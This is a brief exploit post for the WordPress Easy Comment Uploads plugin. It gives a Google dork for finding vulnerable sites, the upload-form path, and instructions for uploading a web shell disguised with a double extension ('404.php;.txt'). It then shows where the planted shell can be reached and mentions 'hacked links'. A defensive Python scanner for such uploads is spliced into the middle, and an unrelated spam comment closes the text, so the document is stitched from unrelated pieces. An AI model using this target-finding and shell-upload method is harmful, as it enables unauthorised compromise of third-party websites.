Exploit WordPress "/easy-comment-uploads/upload-form.php"
Find Out Sites from this Dork
Dork : "/easy-comment-uploads/upload-form.php"
*|_Exploit_|*
http://[localhost]/[path]/easy-comment-uploads/upload-form.php
http://[localhost]/easy-comment-uploads/upload-form.php
For example
File Extension: [.txt], [.jpg], [.gif], [.bmp]
Preview Your Upload Page
In my case I uploaded hitcher1.jpg
site/wp-content/uploads/[years]/[month]/[yourshell]
example: site/wp-content/uploads/2011/06/404.php;.txt
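Added example, not part of the original post: a defender-side check for the upload pattern described above. It scans a `wp-content/uploads` tree for names such as `404.php;.txt` and for files with an accepted extension whose content carries a PHP open tag. The executable-extension list, the function names and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Script-handler extensions (assumed list) and the extensions the post says the form accepts.
EXECUTABLE = {"php", "php3", "php4", "php5", "phtml", "phar", "asp", "aspx", "jsp", "cgi", "pl"}
ALLOWED = {"txt", "jpg", "gif", "bmp"}

def classify(filename):
    """Return the reasons an uploaded file name is suspicious (empty list = clean)."""
    reasons = []
    exts = re.split(r"[.;]", filename.lower())[1:]
    if ";" in filename or "\x00" in filename:
        reasons.append("separator character in name")
    if any(e in EXECUTABLE for e in exts):
        reasons.append("executable extension in name")
    if not exts or exts[-1] not in ALLOWED:
        reasons.append("final extension not allowed")
    return reasons

def scan_uploads(root):
    """Walk an uploads tree; flag bad names and script content behind clean names."""
    findings = {}
    for path in (p for p in Path(root).rglob("*") if p.is_file()):
        reasons = classify(path.name)
        if b"<?php" in path.read_bytes()[:1 << 20].lower():
            reasons.append("PHP open tag in content")
        if reasons:
            findings[path.relative_to(root).as_posix()] = reasons
    return findings

def build_sample_tree():
    """Create a constructed uploads/[year]/[month] tree for the demo; returns its root."""
    root = Path(tempfile.mkdtemp(prefix="uploads-"))
    samples = {
        "2011/06/404.php;.txt": b"<?php /* constructed placeholder */ ?>",
        "2011/11/photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,
        "2011/11/banner.jpg": b"\xff\xd8\xff\xe0<?php /* constructed placeholder */ ?>",
    }
    for rel, data in samples.items():
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(data)
    return str(root)

if __name__ == "__main__":
    for rel, reasons in sorted(scan_uploads(build_sample_tree()).items()):
        print(rel, "->", ", ".join(reasons))
```

Applying `classify` at upload time, and storing files under a server-generated name in a directory where script execution is disabled, closes the same gap the scan detects after the fact.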
For example hacked links
Me and my friend were arguing about an issue similar to this! Now I know that I was right. lol! Thanks for the information you post.